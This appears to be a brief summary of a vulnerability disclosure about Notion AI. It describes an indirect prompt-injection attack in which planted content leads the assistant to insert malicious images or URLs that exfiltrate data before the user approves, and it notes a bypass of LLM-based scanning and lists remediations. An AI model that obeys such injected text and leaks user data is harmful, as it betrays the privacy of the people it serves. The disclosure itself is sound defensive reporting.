Notion AI: Unpatched data exfiltration
4 months ago
- #data-exfiltration
- #cybersecurity
- #AI-vulnerability
- Notion AI is vulnerable to data exfiltration via indirect prompt injection, where AI edits are saved before user approval.
- Attackers can manipulate Notion AI to insert malicious images or URLs, exfiltrating sensitive data like hiring tracker details before user consent.
- The vulnerability was disclosed to Notion via HackerOne but was marked as 'Not Applicable'.
- Notion AI's defenses, like LLM-based document scanning, can be bypassed with prompt injections.
- Additional attack surfaces include Notion Mail AI drafting assistant, which can render insecure Markdown images.
- Recommended remediations include vetting connected data sources, disabling web search, and requiring confirmation for web requests.
- Notion should prohibit automatic rendering of external Markdown images and implement a strong Content Security Policy.